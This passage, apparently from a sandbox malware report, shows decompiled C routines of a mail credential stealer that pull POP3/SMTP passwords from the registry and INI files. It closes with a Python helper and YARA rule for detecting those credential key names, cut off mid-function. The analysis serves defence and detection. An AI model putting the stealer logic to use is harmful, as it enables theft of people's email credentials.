        __eflags = _t52 - _t38;
        if(_t52 <= _t38) {
            goto L15;
        }
        goto L9;
    } else {
        _t52 = 1;
        L9:
        E0040AF17(_t49, _t38); // executed
        E0040A5AC(_t49);
        _t31 =  *((intOrPtr*)(_t49 + 0x37c));
        if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
            _t42 = 0x412466;
        } else {
            _t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
            if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
                _t42 = 0;
            } else {
                _t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
            }
        }
         *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
        E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
        _t38 = 1;
        E0040B0C2(_t49);
        L15:
        return _t38;
    }
}

APIs
  • Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
  • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
  • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
  • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
  • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28
• _stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strlen$_stricmpmemset
• String ID: /stext
• API String ID: 3575250601-3817206916
• Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
• Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
• Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
• Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00406252() {
    struct tagLOGFONTA _v64;
    struct HFONT__* _t6;

    E00406191( &_v64, "Arial", 0xe, 0);
    _t6 = CreateFontIndirectA( &_v64); // executed
    return _t6;
}

APIs
  • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
  • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
• CreateFontIndirectA.GDI32(?), ref: 00406270
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CreateFontIndirectmemsetstrcpy
• String ID: Arial
• API String ID: 3275230829-493054409
• Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
• Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
• Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
• Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004047A0(CHAR* __esi, void* __eflags) {
    struct HINSTANCE__* _t8;
    char _t12;
    char* _t15;
    CHAR* _t17;

    _t17 = __esi;
    E004047F1(__esi);
    _t8 = LoadLibraryA(__esi); // executed
    __esi[0x200] = _t8;
    if(_t8 != 0) {
        _t12 = GetProcAddress(_t8,  &(__esi[0xff]));
        __esi[0x208] = _t12;
        if(_t12 != 0) {
            __esi[0x204] = 1;
        }
    }
    _t15 =  &(_t17[0x204]);
    if( *_t15 == 0) {
        E004047F1(_t17);
    }
    return  *_t15;
}

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 145871493-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 0040EB35
                                                                                                                                                      • Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
                                                                                                                                                      • Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
                                                                                                                                                      • Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4165544737-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Releases the module handle kept at offset 0x200 of the object passed in EAX
// and clears both that slot and the resolved-function slot at offset 0x204.
E004047F1(void* __eax) {
	struct HINSTANCE__* _t5;
	signed int* _t7;

	*(__eax + 0x204) = *(__eax + 0x204) & 0x00000000;   // drop the cached GetProcAddress result
	_t7 = __eax + 0x200;
	_t5 = *_t7;
	if(_t5 != 0) {
		_t5 = FreeLibrary(_t5); // executed
		*_t7 = *_t7 & 0x00000000;                        // forget the freed module handle
	}
	return _t5;
}


                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Creates (or truncates) the named file for writing:
// 0x40000000 = GENERIC_WRITE, 1 = FILE_SHARE_READ, 2 = CREATE_ALWAYS.
E00405EE4(CHAR* _a4) {
	void* _t3;

	_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
	return _t3;
}


                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Same unload pattern as E004047F1, on a different structure layout: the module
// handle lives at offset 8 and a cached pointer at offset 0xc of the object in ESI.
E0040E894(void* __esi) {
	struct HINSTANCE__* _t6;
	int _t7;

	_t6 = *(__esi + 8);
	*(__esi + 0xc) = *(__esi + 0xc) & 0x00000000;       // clear the cached pointer first
	if(_t6 != 0) {
		_t7 = FreeLibrary(_t6); // executed
		*(__esi + 8) = *(__esi + 8) & 0x00000000;        // forget the freed module handle
		return _t7;
	}
	return _t6;
}


                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Walks every resource of type _a8 in module _a4, invoking E0040ED0B once per
// resource name; the enumeration result is ignored and the function always returns 1.
E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {

	EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
	return 1;
}


                                                                                                                                                    APIs
                                                                                                                                                    • EnumResourceNamesA.KERNEL32 ref: 0040EDA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Closes a directory-search handle stored at *ESI if it is not INVALID_HANDLE_VALUE
// (0xffffffff) and resets the slot to INVALID_HANDLE_VALUE afterwards.
E00406F5B(signed int* __esi) {
	int _t2;
	void* _t3;

	_t3 = *__esi;
	if(_t3 != 0xffffffff) {
		_t2 = FindClose(_t3); // executed
		*__esi = *__esi | 0xffffffff;                    // mark the handle slot as closed
		return _t2;
	}
	return 0;
}

                                                                                                                                                    APIs
                                                                                                                                                    • FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                    • Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                                                                                                    • Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
                                                                                                                                                    • Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                                                                                                    • Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040614B(CHAR* _a4) {
                                                                                                                                                    				long _t4;
                                                                                                                                                    
                                                                                                                                                    				_t4 = GetFileAttributesA(_a4); // executed
                                                                                                                                                    				return 0 | _t4 != 0xffffffff;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                                                                                    • Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
                                                                                                                                                    • Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                                                                                    • Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040EB3F(void* _a4, char* _a8, void** _a12) {
                                                                                                                                                    				long _t4;
                                                                                                                                                    
                                                                                                                                                    				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
                                                                                                                                                    				return _t4;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Open
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                    • Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                                                                                                    • Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
                                                                                                                                                    • Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                                                                                                    • Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				char _v20;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				char _v152;
                                                                                                                                                    				char _v280;
                                                                                                                                                    				char _v408;
                                                                                                                                                    				intOrPtr _v412;
                                                                                                                                                    				char _v668;
                                                                                                                                                    				char _v796;
                                                                                                                                                    				intOrPtr _v800;
                                                                                                                                                    				char _v928;
                                                                                                                                                    				char _v940;
                                                                                                                                                    				char _v952;
                                                                                                                                                    				char _v956;
                                                                                                                                                    				char _v1084;
                                                                                                                                                    				char _v1212;
                                                                                                                                                    				char _v1340;
                                                                                                                                                    				intOrPtr _v1344;
                                                                                                                                                    				char _v1600;
                                                                                                                                                    				char _v1728;
                                                                                                                                                    				intOrPtr _v1732;
                                                                                                                                                    				char _v1860;
                                                                                                                                                    				char _v1872;
                                                                                                                                                    				void* _t59;
                                                                                                                                                    				signed int _t60;
                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                    				void* _t113;
                                                                                                                                                    				void* _t118;
                                                                                                                                                    				void* _t122;
                                                                                                                                                    				char* _t123;
                                                                                                                                                    				void* _t141;
                                                                                                                                                    
                                                                                                                                                    				_t141 = __fp0;
                                                                                                                                                    				_t118 = __edi;
                                                                                                                                                    				_t113 = __ecx;
                                                                                                                                                    				_t59 = E0040EB3F(_a4, _a8,  &_a8);
                                                                                                                                                    				if(_t59 == 0) {
                                                                                                                                                    					_t60 = 0x7d;
                                                                                                                                                    					_a4 = _t60;
                                                                                                                                                    					_v8 = _t60;
                                                                                                                                                    					E004021D8( &_v1872);
                                                                                                                                                    					E004021D8( &_v940);
                                                                                                                                                    					_t63 = 2;
                                                                                                                                                    					_v1732 = _t63;
                                                                                                                                                    					_v800 = _t63;
                                                                                                                                                    					_push( &_v928);
                                                                                                                                                    					_push("DisplayName");
                                                                                                                                                    					_push(_a8);
                                                                                                                                                    					_v1344 = 4;
                                                                                                                                                    					_t122 = 0x7f;
                                                                                                                                                    					_v412 = 1;
                                                                                                                                                    					E0040EB80(_t122, _t113);
                                                                                                                                                    					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
                                                                                                                                                    					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
                                                                                                                                                    					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
                                                                                                                                                    					E0040EB59(_t113, _a8, "PopPort",  &_v24);
                                                                                                                                                    					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
                                                                                                                                                    					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
                                                                                                                                                    						_a4 = _a4 & 0x00000000;
                                                                                                                                                    					}
                                                                                                                                                    					strcpy( &_v1860,  &_v928);
                                                                                                                                                    					strcpy( &_v1728,  &_v796);
                                                                                                                                                    					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
                                                                                                                                                    					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
                                                                                                                                                    					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
                                                                                                                                                    					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
                                                                                                                                                    					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
                                                                                                                                                    						_v8 = _v8 & 0x00000000;
                                                                                                                                                    					}
                                                                                                                                                    					_t123 = _t118 + 0xa9c;
                                                                                                                                                    					strcpy( &_v152, _t123);
                                                                                                                                                    					strcpy( &_v1084, _t123);
                                                                                                                                                    					_t116 = _a4;
                                                                                                                                                    					if(_a4 > 0) {
                                                                                                                                                    						E00401D18( &_v280, _t116);
                                                                                                                                                    					}
                                                                                                                                                    					if(_v408 != 0) {
                                                                                                                                                    						E00402407( &_v940, _t141, _t118);
                                                                                                                                                    					}
                                                                                                                                                    					_t117 = _v8;
                                                                                                                                                    					if(_v8 > 0) {
                                                                                                                                                    						E00401D18( &_v1212, _t117);
                                                                                                                                                    					}
                                                                                                                                                    					if(_v1340 != 0) {
                                                                                                                                                    						E00402407( &_v1872, _t141, _t118);
                                                                                                                                                    					}
                                                                                                                                                    					return RegCloseKey(_a8);
                                                                                                                                                    				}
                                                                                                                                                    				return _t59;
                                                                                                                                                    			}
Instruction addresses: 0x00402d9a to 0x00402fbf (the report lists one address per decompiled line; the column is collapsed here because the extraction detached it from the code)

APIs
  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
  • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
  • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
  • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
• strcpy.MSVCRT(?,?), ref: 00402EB1
• strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
• strcpy.MSVCRT(?,?), ref: 00402F51
• strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
• RegCloseKey.ADVAPI32(?), ref: 00402FB8
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strcpy$QueryValue$CloseOpen
• String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
• API String ID: 4127491968-1534328989
• Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
• Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
• Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
• Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004033D7(void* __edi, void* __fp0, intOrPtr _a4) {
	/* Six stack buffers receive the INI values read below. _v936 and _v1868 are
	   the two records (SMTP and POP3) handed to E00402407, the same routine the
	   registry-based function above passes its results to. */
	char _v276;
	char _v404;
	intOrPtr _v408;
	char _v664;
	intOrPtr _v796;
	char _v936;
	char _v1208;
	char _v1336;
	intOrPtr _v1340;
	char _v1596;
	intOrPtr _v1728;
	char _v1868;
	void* __esi;
	intOrPtr _t23;
	void* _t35;
	void* _t48;   /* decompiler temporary (undeclared in the raw output); carries __fp0 to the second E00402407 call */

	_t48 = __fp0;
	E004021D8( &_v936);     /* initialise the SMTP record */
	E004021D8( &_v1868);    /* initialise the POP3 record */
	_t23 = 4;
	_v796 = _t23;           /* fixed fields inside the records are set to 4 and 1; */
	_v1728 = _t23;          /* their meaning is not recoverable from this dump */
	_v408 = _t23;
	_v1340 = 1;
	/* Each call reads one INI key through the wrapper E00403397 (the API summary
	   below lists GetPrivateProfileString, _mbscmp and strlen). __edi is
	   presumably the file/section context supplied by the caller. */
	E00403397(__edi, "SMTPServer",  &_v664);
	E00403397(__edi, "ESMTPUsername",  &_v404);
	E00403397(__edi, "ESMTPPassword",  &_v276);
	E00403397(__edi, "POP3Server",  &_v1596);
	E00403397(__edi, "POP3Username",  &_v1336);
	_t35 = E00403397(__edi, "POP3Password",  &_v1208);
	/* A record is only emitted when its password buffer is non-empty (first byte
	   not NUL). E004033B8 transforms the password in place first; it is likely a
	   decoder, but its body is not in this section. */
	if(_v276 != 0) {
		E004033B8( &_v276);
		_t35 = E00402407( &_v936, __fp0, _a4);
	}
	if(_v1208 != 0) {
		E004033B8( &_v1208);
		return E00402407( &_v1868, _t48, _a4);
	}
	return _t35;
}
Instruction addresses: 0x004033d7 to 0x004034c8 (address column collapsed, as above)

Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: PrivateProfileString_mbscmpstrlen
• String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
• API String ID: 3963849919-1658304561
• Opcode ID: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
• Instruction ID: 83b6c818750e3233ea62b9214f8e154f1c79117fabd3a6fe6fd9d90b5f1d4615
• Opcode Fuzzy Hash: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
• Instruction Fuzzy Hash: DA21E271844218A9DB61EB11CD86BED7B7C9F44709F0000EBAA08B60D2DBBC5BD58F59
Uniqueness

Uniqueness Score: -1.00%
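The two routines above share one trait a responder can pivot on: each carries a fixed cluster of mail-account value names (the registry set DisplayName/EmailAddress/Pop*/SMTP* read via RegQueryValueExA, and the INI set SMTPServer/ESMTP*/POP3* read via the GetPrivateProfileString wrapper), stored as NUL-terminated C strings in the unpacked image. The following triage helper is an added example, not part of the Joe Sandbox report and not the sample's own code: it scans a raw memory dump for both clusters, reports coverage and the byte span of the hits, and emits a YARA rule from the key list. The key lists are copied from the report's String IDs; the dump built in build_demo_dump() is constructed for this example.

```python
"""
Added triage helper (not part of the Joe Sandbox report, not the sample's code):
scan a raw dump for the mail-credential name clusters referenced by the two
decompiled routines, and emit a YARA rule for them. Key lists come from the
report's String IDs; build_demo_dump() is a constructed stand-in for a dump.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Registry value names the first routine reads with RegQueryValueExA
# (String ID of the function ending at 0x00402fbf).
REGISTRY_MAIL_KEYS: List[str] = [
    "DisplayName", "EmailAddress", "PopAccount", "PopLogSecure",
    "PopPassword", "PopPort", "PopServer", "SMTPAccount",
    "SMTPLogSecure", "SMTPPassword", "SMTPPort", "SMTPServer",
]

# INI keys E004033D7 reads through its GetPrivateProfileString wrapper.
INI_MAIL_KEYS: List[str] = [
    "SMTPServer", "ESMTPUsername", "ESMTPPassword",
    "POP3Server", "POP3Username", "POP3Password",
]


@dataclass
class ClusterHit:
    name: str
    found: Dict[str, int]      # key -> offset of its first NUL-delimited hit
    missing: List[str]

    @property
    def complete(self) -> bool:
        return not self.missing

    @property
    def coverage(self) -> float:
        total = len(self.found) + len(self.missing)
        return len(self.found) / total if total else 0.0

    @property
    def span(self) -> Optional[range]:
        """Byte range covered by the hits; a tight span is what a string table
        in .rdata looks like, scattered offsets suggest false positives."""
        if not self.found:
            return None
        offs = sorted(self.found.values())
        return range(offs[0], offs[-1] + 1)


def find_cstring(buf: bytes, key: str) -> int:
    """Offset of `key` stored as a C string: preceded by NUL (or buffer start)
    and followed by NUL. Rejects hits inside longer names like MySMTPServerPort."""
    needle = key.encode("ascii") + b"\x00"
    pos = buf.find(needle)
    while pos >= 0:
        if pos == 0 or buf[pos - 1] == 0:
            return pos
        pos = buf.find(needle, pos + 1)
    return -1


def scan_cluster(buf: bytes, name: str, keys: List[str]) -> ClusterHit:
    found: Dict[str, int] = {}
    missing: List[str] = []
    for key in keys:
        off = find_cstring(buf, key)
        if off < 0:
            missing.append(key)
        else:
            found[key] = off
    return ClusterHit(name, found, missing)


def scan_dump(buf: bytes) -> Dict[str, ClusterHit]:
    """Run both clusters over one dump. 'SMTPServer' is in both lists, so one
    occurrence satisfies both; acceptable for triage."""
    return {
        "registry": scan_cluster(buf, "registry", REGISTRY_MAIL_KEYS),
        "ini": scan_cluster(buf, "ini", INI_MAIL_KEYS),
    }


def yara_rule(rule_name: str, keys: List[str], min_hits: int) -> str:
    """Fullword ASCII rule; a min_hits below len(keys) tolerates a variant
    that drops or renames a value name or two."""
    lines = [f"rule {rule_name}", "{", "    strings:"]
    lines += [f'        $s{i} = "{k}" ascii fullword' for i, k in enumerate(keys)]
    lines += ["    condition:", f"        {min_hits} of ($s*)", "}"]
    return "\n".join(lines)


def build_demo_dump() -> bytes:
    """Constructed input: filler, the registry table, a gap, a decoy identifier
    that must not count, then the INI table."""
    def table(keys: List[str]) -> bytes:
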